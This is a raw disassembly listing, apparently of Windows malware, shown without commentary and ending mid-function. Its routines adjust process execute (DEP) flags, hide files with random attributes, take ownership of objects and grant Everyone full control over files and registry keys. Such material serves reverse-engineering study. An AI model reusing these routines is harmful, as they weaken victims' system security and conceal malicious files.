sub_9A67C6 proc near ; CODE XREF: sub_9A3C63+20�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, GetModuleHandleA
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
mov ebx, offset aNtdll_dll ; "ntdll.dll"
push ebx ; lpModuleName
call esi ; GetModuleHandleA
mov edi, GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
push offset aNtsetinformati ; "NtSetInformationProcess"
push ebx ; lpModuleName
mov [ebp+var_8], eax
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
mov esi, eax
xor eax, eax
cmp [ebp+var_8], eax
jz short loc_9A682A
cmp esi, eax
jz short loc_9A682A
push eax
push 4
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call [ebp+var_8]
test eax, eax
jl short loc_9A682A
or [ebp+var_4], 70h
push 4
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call esi
loc_9A682A: ; CODE XREF: sub_9A67C6+39�j
; sub_9A67C6+3D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_9A67C6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A682F(LPCSTR Str,int)
sub_9A682F proc near ; CODE XREF: sub_9A68CA+3C�p
; sub_9A68CA+10E�p
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+Str]
push esi ; lpFileName
call GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz loc_9A68C8
cmp [esp+4+arg_4], 0
jz short loc_9A6863
test al, 7
jz short loc_9A68C8
and eax, 20h
jnz short loc_9A6859
mov eax, 80h
loc_9A6859: ; CODE XREF: sub_9A682F+23�j
push eax ; dwFileAttributes
push esi ; lpFileName
call SetFileAttributesA
pop esi
retn
; ---------------------------------------------------------------------------
loc_9A6863: ; CODE XREF: sub_9A682F+1A�j
test al, 1
jnz short loc_9A68C8
push ebx
call GetTickCount
push esi ; Str
mov ebx, eax
call strlen
cmp eax, 4
pop ecx
jbe short loc_9A68A9
push offset asc_9A1318 ; "H"
push esi ; Str
call strlen
pop ecx
lea eax, [eax+esi-4]
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A68A9
movzx eax, bl
push 4
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_9A68A9
inc edx
jmp short loc_9A68BF
; ---------------------------------------------------------------------------
loc_9A68A9: ; CODE XREF: sub_9A682F+4B�j
; sub_9A682F+68�j ...
shr ebx, 8
movzx eax, bl
push 4
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
and edx, 2
add edx, 5
loc_9A68BF: ; CODE XREF: sub_9A682F+78�j
push edx ; dwFileAttributes
push esi ; lpFileName
call SetFileAttributesA
pop ebx
loc_9A68C8: ; CODE XREF: sub_9A682F+F�j
; sub_9A682F+1E�j ...
pop esi
retn
sub_9A682F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A68CA(LPCSTR Str,int,int)
sub_9A68CA proc near ; CODE XREF: sub_9A3715+81�p
; sub_9A3715+A2�p ...
pSecurityDescriptor= byte ptr -54h
nAclLength = dword ptr -40h
lpFileName = dword ptr -3Ch
var_38 = dword ptr -38h
hMem = dword ptr -34h
pSid = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -24h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 44h
push offset stru_9A2AB0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov eax, [ebp+Str]
mov [ebp+lpFileName], eax
xor ebx, ebx
mov [ebp+var_38], ebx
mov [ebp+hMem], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov edi, [ebp+arg_4]
mov ecx, edi
mov esi, 120116h
and ecx, esi
cmp ecx, esi
jz short loc_9A690D
push ebx ; int
push eax ; Str
call sub_9A682F
pop ecx
pop ecx
loc_9A690D: ; CODE XREF: sub_9A68CA+38�j
mov [ebp+var_2C], bl
mov [ebp+var_2B], bl
mov [ebp+var_2A], bl
mov [ebp+var_29], bl
mov [ebp+var_28], bl
mov [ebp+var_27], 1
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
mov eax, [ebp+arg_8]
cmp eax, ebx
lea ecx, [ebp+pIdentifierAuthority]
jnz short loc_9A694C
lea ecx, [ebp+var_2C]
loc_9A694C: ; CODE XREF: sub_9A68CA+7D�j
lea edx, [ebp+pSid]
push edx ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
neg eax
sbb eax, eax
and eax, 12h
push eax ; nSubAuthority0
push 1 ; nSubAuthorityCount
push ecx ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
add eax, 10h
mov [ebp+nAclLength], eax
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9A69DF
or edi, 100000h
mov [ebp+arg_4], edi
push 2 ; dwAclRevision
push [ebp+nAclLength] ; nAclLength
push eax ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push edi ; AccessMask
push 2 ; dwAceRevision
push [ebp+hMem] ; pAcl
call AddAccessAllowedAce
push ebx ; bDaclDefaulted
push [ebp+hMem] ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+lpFileName] ; lpFileName
call SetFileSecurityA
mov [ebp+var_38], eax
and edi, esi
cmp edi, esi
jnz short loc_9A69DF
push 1 ; int
push [ebp+lpFileName] ; Str
call sub_9A682F
pop ecx
pop ecx
loc_9A69DF: ; CODE XREF: sub_9A68CA+BB�j
; sub_9A68CA+107�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A69F2
; ---------------------------------------------------------------------------
loc_9A69E5: ; DATA XREF: .text:stru_9A2AB0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A69E9: ; DATA XREF: .text:stru_9A2AB0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
loc_9A69F2: ; CODE XREF: sub_9A68CA+119�j
cmp [ebp+hMem], ebx
jz short loc_9A6A00
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A6A00: ; CODE XREF: sub_9A68CA+12B�j
cmp [ebp+pSid], ebx
jz short loc_9A6A0E
push [ebp+pSid] ; pSid
call FreeSid
loc_9A6A0E: ; CODE XREF: sub_9A68CA+139�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A68CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A6A21(LPSTR lpCommandLine,int)
sub_9A6A21 proc near ; CODE XREF: sub_9A7214+D5�p
StartupInfo = _STARTUPINFOA ptr -54h
hObject = _PROCESS_INFORMATION ptr -10h
lpCommandLine = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
xor edx, edx
xor eax, eax
mov [ebp+hObject.hProcess], edx
push 10h
lea edi, [ebp+hObject.hThread]
stosd
stosd
stosd
pop ecx
xor eax, eax
mov [ebp+StartupInfo.cb], 44h
lea edi, [ebp+StartupInfo.lpReserved]
rep stosd
mov eax, [ebp+arg_4]
xor edi, edi
inc edi
xor esi, esi
neg eax
sbb eax, eax
and eax, 5
mov [ebp+StartupInfo.wShowWindow], ax
lea eax, [ebp+hObject]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push edx ; lpCurrentDirectory
push edx ; lpEnvironment
push edx ; dwCreationFlags
push edx ; bInheritHandles
push edx ; lpThreadAttributes
push edx ; lpProcessAttributes
push [ebp+lpCommandLine] ; lpCommandLine
mov [ebp+StartupInfo.dwFlags], edi
push edx ; lpApplicationName
call CreateProcessA
test eax, eax
jz short loc_9A6A8B
push [ebp+hObject.hProcess] ; hObject
mov esi, CloseHandle
call esi ; CloseHandle
push [ebp+hObject.hThread] ; hObject
call esi ; CloseHandle
mov esi, edi
loc_9A6A8B: ; CODE XREF: sub_9A6A21+56�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_9A6A21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6A91 proc near ; CODE XREF: sub_9A3C63+123�p
pSid1 = dword ptr -2Ch
var_28 = dword ptr -28h
hObject = dword ptr -24h
ReturnLength = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
pSid = dword ptr -14h
pSid2 = dword ptr -10h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_9B8788
xor eax, ebp
push ebx
mov [ebp+var_4], eax
lea eax, [ebp+hObject]
push eax ; TokenHandle
xor ebx, ebx
push 8 ; DesiredAccess
mov [ebp+var_1C], ebx
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz loc_9A6BDB
push esi
mov esi, GetTokenInformation
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push ebx ; TokenInformationLength
push ebx ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jnz loc_9A6BD1
call GetLastError
cmp eax, 7Ah
jnz loc_9A6BD1
push edi
push [ebp+ReturnLength] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
cmp edi, ebx
jz loc_9A6BD0
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push [ebp+ReturnLength] ; TokenInformationLength
push edi ; TokenInformation
push 2 ; TokenInformationClass
push [ebp+hObject] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jz loc_9A6BC9
mov esi, AllocateAndInitializeSid
lea eax, [ebp+pSid2]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 4 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pSid2], ebx
mov [ebp+pSid], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
call esi ; AllocateAndInitializeSid
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 6 ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call esi ; AllocateAndInitializeSid
cmp [edi], ebx
mov [ebp+var_1C], 1
mov [ebp+var_18], ebx
jbe short loc_9A6BAF
lea esi, [edi+4]
loc_9A6B74: ; CODE XREF: sub_9A6A91+117�j
mov eax, [esi]
push [ebp+pSid2] ; pSid2
mov ecx, [esi+4]
push eax ; pSid1
mov [ebp+pSid1], eax
mov [ebp+var_28], ecx
call EqualSid
test eax, eax
jnz short loc_9A6BAC
push [ebp+pSid] ; pSid2
push [ebp+pSid1] ; pSid1
call EqualSid
test eax, eax
jnz short loc_9A6BAF
inc [ebp+var_18]
mov eax, [ebp+var_18]
add esi, 8
cmp eax, [edi]
jb short loc_9A6B74
jmp short loc_9A6BAF
; ---------------------------------------------------------------------------
loc_9A6BAC: ; CODE XREF: sub_9A6A91+FA�j
mov [ebp+var_1C], ebx
loc_9A6BAF: ; CODE XREF: sub_9A6A91+DE�j
; sub_9A6A91+10A�j ...
cmp [ebp+pSid], ebx
mov esi, FreeSid
jz short loc_9A6BBF
push [ebp+pSid] ; pSid
call esi ; FreeSid
loc_9A6BBF: ; CODE XREF: sub_9A6A91+127�j
cmp [ebp+pSid2], ebx
jz short loc_9A6BC9
push [ebp+pSid2] ; pSid
call esi ; FreeSid
loc_9A6BC9: ; CODE XREF: sub_9A6A91+83�j
; sub_9A6A91+131�j
push edi ; hMem
call GlobalFree
loc_9A6BD0: ; CODE XREF: sub_9A6A91+6C�j
pop edi
loc_9A6BD1: ; CODE XREF: sub_9A6A91+47�j
; sub_9A6A91+56�j
push [ebp+hObject] ; hObject
call CloseHandle
pop esi
loc_9A6BDB: ; CODE XREF: sub_9A6A91+2B�j
mov ecx, [ebp+var_4]
mov eax, [ebp+var_1C]
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn
sub_9A6A91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6BEB proc near ; CODE XREF: sub_9A6CF7+8A�p
pSecurityDescriptor= byte ptr -50h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
hKey = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
pSid = dword ptr -28h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -24h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 40h
push offset stru_9A2AC0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
mov [ebp+hKey], eax
xor ebx, ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 12h ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
mov esi, eax
add esi, 10h
mov [ebp+var_38], esi
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz short loc_9A6CB5
push 2 ; dwAclRevision
push esi ; nAclLength
push edi ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push 20019h ; AccessMask
push 2 ; dwAceRevision
push edi ; pAcl
call AddAccessAllowedAce
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
push ebx ; bDaclDefaulted
push edi ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+hKey] ; hKey
call RegSetKeySecurity
mov [ebp+var_3C], eax
xor ecx, ecx
cmp eax, ebx
setz cl
mov [ebp+var_30], ecx
loc_9A6CB5: ; CODE XREF: sub_9A6BEB+77�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A6CCB
; ---------------------------------------------------------------------------
loc_9A6CBB: ; DATA XREF: .text:stru_9A2AC0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A6CBF: ; DATA XREF: .text:stru_9A2AC0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
mov edi, [ebp+var_2C]
loc_9A6CCB: ; CODE XREF: sub_9A6BEB+CE�j
cmp edi, ebx
jz short loc_9A6CD6
push edi ; hMem
call GlobalFree
loc_9A6CD6: ; CODE XREF: sub_9A6BEB+E2�j
cmp [ebp+pSid], ebx
jz short loc_9A6CE4
push [ebp+pSid] ; pSid
call FreeSid
loc_9A6CE4: ; CODE XREF: sub_9A6BEB+EE�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A6BEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=198h
; int __cdecl sub_9A6CF7(HKEY hKey)
sub_9A6CF7 proc near ; CODE XREF: sub_9A6CF7+5A�p
; sub_9A7B42+27A�p
phkResult = dword ptr -218h
cchName = dword ptr -214h
dwIndex = dword ptr -210h
Name = word ptr -20Ch
var_4 = dword ptr -4
hKey = dword ptr 8
push ebp
lea ebp, [esp-198h]
sub esp, 218h
mov eax, dword_9B8788
push ebx
mov ebx, [ebp+198h+hKey]
push esi
push edi
mov edi, RegEnumKeyExW
xor eax, ebp
xor esi, esi
push esi
push esi
push esi
mov [ebp+198h+var_4], eax
push esi
lea eax, [ebp+198h+cchName]
push eax
lea eax, [ebp+198h+Name]
push eax
mov [ebp+198h+dwIndex], esi
push esi
jmp short loc_9A6D72
; ---------------------------------------------------------------------------
loc_9A6D35: ; CODE XREF: sub_9A6CF7+87�j
lea eax, [ebp+198h+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push esi ; ulOptions
lea eax, [ebp+198h+Name]
push eax ; lpSubKey
push ebx ; hKey
call RegOpenKeyExW
test eax, eax
jnz short loc_9A6D60
push [ebp+198h+phkResult] ; hKey
call sub_9A6CF7
pop ecx
push [ebp+198h+phkResult] ; hKey
call RegCloseKey
loc_9A6D60: ; CODE XREF: sub_9A6CF7+55�j
inc [ebp+198h+dwIndex]
push esi ; lpftLastWriteTime
push esi ; lpcchClass
push esi ; lpClass
push esi ; lpReserved
lea eax, [ebp+198h+cchName]
push eax ; lpcchName
lea eax, [ebp+198h+Name]
push eax ; lpName
push [ebp+198h+dwIndex] ; dwIndex
loc_9A6D72: ; CODE XREF: sub_9A6CF7+3C�j
push ebx ; hKey
mov [ebp+198h+cchName], 104h
call edi ; RegEnumKeyExW
test eax, eax
jz short loc_9A6D35
push ebx
call sub_9A6BEB
pop ecx
mov ecx, [ebp+198h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 198h
leave
retn
sub_9A6CF7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A6D9F(HANDLE TokenHandle,TOKEN_INFORMATION_CLASS TokenInformationClass)
sub_9A6D9F proc near ; CODE XREF: sub_9A6DFC+23�p
Size = dword ptr -4
TokenHandle = dword ptr 8
TokenInformationClass= dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, GetTokenInformation
push edi
lea eax, [ebp+Size]
push eax ; ReturnLength
push 0 ; TokenInformationLength
push 0 ; TokenInformation
push [ebp+TokenInformationClass] ; TokenInformationClass
push [ebp+TokenHandle] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jnz short loc_9A6DF6
call GetLastError
cmp eax, 7Ah
jnz short loc_9A6DF6
push [ebp+Size] ; Size
call malloc
pop ecx
mov edi, eax
lea eax, [ebp+Size]
push eax ; ReturnLength
push [ebp+Size] ; TokenInformationLength
push edi ; TokenInformation
push [ebp+TokenInformationClass] ; TokenInformationClass
push [ebp+TokenHandle] ; TokenHandle
call esi ; GetTokenInformation
test eax, eax
jz short loc_9A6DEE
mov eax, edi
jmp short loc_9A6DF8
; ---------------------------------------------------------------------------
loc_9A6DEE: ; CODE XREF: sub_9A6D9F+49�j
push edi ; Memory
call free
pop ecx
loc_9A6DF6: ; CODE XREF: sub_9A6D9F+1E�j
; sub_9A6D9F+29�j
xor eax, eax
loc_9A6DF8: ; CODE XREF: sub_9A6D9F+4D�j
pop edi
pop esi
leave
retn
sub_9A6D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6DFC proc near ; CODE XREF: sub_9A6E36+12�p
TokenHandle = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+TokenHandle]
push eax ; TokenHandle
push 18h ; DesiredAccess
xor esi, esi
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz short loc_9A6E31
push 1 ; TokenInformationClass
push [ebp+TokenHandle] ; TokenHandle
call sub_9A6D9F
pop ecx
pop ecx
push [ebp+TokenHandle] ; hObject
mov esi, eax
call CloseHandle
loc_9A6E31: ; CODE XREF: sub_9A6DFC+1C�j
mov eax, esi
pop esi
leave
retn
sub_9A6DFC endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A6E36(LPWSTR pObjectName,SE_OBJECT_TYPE ObjectType)
sub_9A6E36 proc near ; CODE XREF: sub_9A6E7C+2B�p
pObjectName = dword ptr 4
ObjectType = dword ptr 8
push esi
push edi
push 1 ; int
push offset aSetakeownershi ; "SeTakeOwnershipPrivilege"
xor esi, esi
call sub_9A5DFA
pop ecx
pop ecx
call sub_9A6DFC
mov edi, eax
cmp edi, esi
jz short loc_9A6E77
push esi ; pSacl
push esi ; pDacl
push esi ; psidGroup
push dword ptr [edi] ; psidOwner
push 1 ; SecurityInfo
push [esp+1Ch+ObjectType] ; ObjectType
push [esp+20h+pObjectName] ; pObjectName
call SetNamedSecurityInfoW
mov esi, eax
neg esi
sbb esi, esi
push edi ; Memory
inc esi
call free
pop ecx
loc_9A6E77: ; CODE XREF: sub_9A6E36+1B�j
pop edi
mov eax, esi
pop esi
retn
sub_9A6E36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6E7C proc near ; CODE XREF: sub_9A7001+3B�p
pListOfExplicitEntries= _EXPLICIT_ACCESS_W ptr -54h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
pSid = dword ptr -2Ch
hMem = dword ptr -28h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -24h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 44h
push offset stru_9A2AE8
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
mov esi, ecx
mov edi, edx
xor ebx, ebx
mov [ebp+var_30], ebx
mov [ebp+hMem], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
push 4 ; ObjectType
push edi ; pObjectName
call sub_9A6E36
pop ecx
pop ecx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 1
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push ebx ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
test eax, eax
jz short loc_9A6F40
mov [ebp+pListOfExplicitEntries.grfAccessPermissions], 10000000h
mov [ebp+pListOfExplicitEntries.grfAccessMode], 2
neg esi
sbb esi, esi
and esi, 3
mov [ebp+pListOfExplicitEntries.grfInheritance], esi
mov [ebp+pListOfExplicitEntries.Trustee.TrusteeForm], ebx
mov [ebp+pListOfExplicitEntries.Trustee.TrusteeType], 5
mov eax, [ebp+pSid]
mov [ebp+pListOfExplicitEntries.Trustee.ptstrName], eax
lea eax, [ebp+hMem]
push eax ; NewAcl
push ebx ; OldAcl
lea eax, [ebp+pListOfExplicitEntries]
push eax ; pListOfExplicitEntries
push 1 ; cCountOfExplicitEntries
call SetEntriesInAclW
mov [ebp+var_34], eax
cmp eax, ebx
jnz short loc_9A6F40
cmp [ebp+hMem], ebx
jz short loc_9A6F40
push ebx ; pSacl
push [ebp+hMem] ; pDacl
push ebx ; psidGroup
push ebx ; psidOwner
push 4 ; SecurityInfo
push 4 ; ObjectType
push edi ; pObjectName
call SetNamedSecurityInfoW
mov [ebp+var_34], eax
xor ecx, ecx
cmp eax, ebx
setz cl
mov [ebp+var_30], ecx
loc_9A6F40: ; CODE XREF: sub_9A6E7C+5F�j
; sub_9A6E7C+9F�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_4
cmp [ebp+hMem], ebx
jz short loc_9A6F57
push [ebp+hMem] ; hMem
call LocalFree
loc_9A6F57: ; CODE XREF: sub_9A6E7C+D0�j
cmp [ebp+pSid], ebx
jz short loc_9A6F65
push [ebp+pSid] ; pSid
call FreeSid
loc_9A6F65: ; CODE XREF: sub_9A6E7C+DE�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A6E7C endp
; =============== S U B R O U T I N E =======================================
sub_9A6F78 proc near ; DATA XREF: .text:stru_9A2AE8�o
xor ebx, ebx
sub_9A6F78 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A6F7B proc near ; CODE XREF: sub_9A7001+2B�p
; sub_9A706C+35�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
xor edx, edx
cmp esi, edx
mov [ebp+var_4], edx
mov [ebp+var_24], 80000000h
mov [ebp+var_20], offset aClasses_root ; "CLASSES_ROOT"
mov [ebp+var_1C], 80000001h
mov [ebp+var_18], offset aCurrent_user ; "CURRENT_USER"
mov [ebp+var_14], 80000002h
mov [ebp+var_10], offset aMachine ; "MACHINE"
mov [ebp+var_C], 80000003h
mov [ebp+var_8], offset aUsers ; "USERS"
jz short loc_9A6FFC
xor ecx, ecx
loc_9A6FC4: ; CODE XREF: sub_9A6F7B+5A�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+edx*8+var_24]
jnz short loc_9A6FD1
mov ecx, [ebp+edx*8+var_20]
loc_9A6FD1: ; CODE XREF: sub_9A6F7B+50�j
inc edx
cmp edx, 4
jb short loc_9A6FC4
test ecx, ecx
jz short loc_9A6FFC
push [ebp+arg_4]
push ecx
push offset aSS ; "%s\\%s"
push esi ; Count
push edi ; Dest
call _snwprintf
add esp, 14h
and word ptr [edi+esi*2-2], 0
mov [ebp+var_4], 1
loc_9A6FFC: ; CODE XREF: sub_9A6F7B+45�j
; sub_9A6F7B+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_9A6F7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7001 proc near ; CODE XREF: sub_9A4207+5D�p
; sub_9A4358+140�p ...
var_20C = byte ptr -20Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20Ch
mov eax, dword_9B8788
mov ecx, [ebp+arg_4]
push ebx
push esi
xor eax, ebp
push edi
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ecx
push eax
mov esi, 104h
lea edi, [ebp+var_20C]
xor ebx, ebx
call sub_9A6F7B
test eax, eax
pop ecx
pop ecx
jz short loc_9A7043
mov ecx, [ebp+arg_8]
mov edx, edi
call sub_9A6E7C
mov ebx, eax
loc_9A7043: ; CODE XREF: sub_9A7001+34�j
mov ecx, [ebp+var_4]
pop edi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn
sub_9A7001 endp
; =============== S U B R O U T I N E =======================================
sub_9A7054 proc near ; CODE XREF: sub_9A3A68:loc_9A3AC8�p
call GetVersion
cmp al, 6
ja short loc_9A7068
jnz short loc_9A7065
cmp ah, 1
jnb short loc_9A7068
loc_9A7065: ; CODE XREF: sub_9A7054+A�j
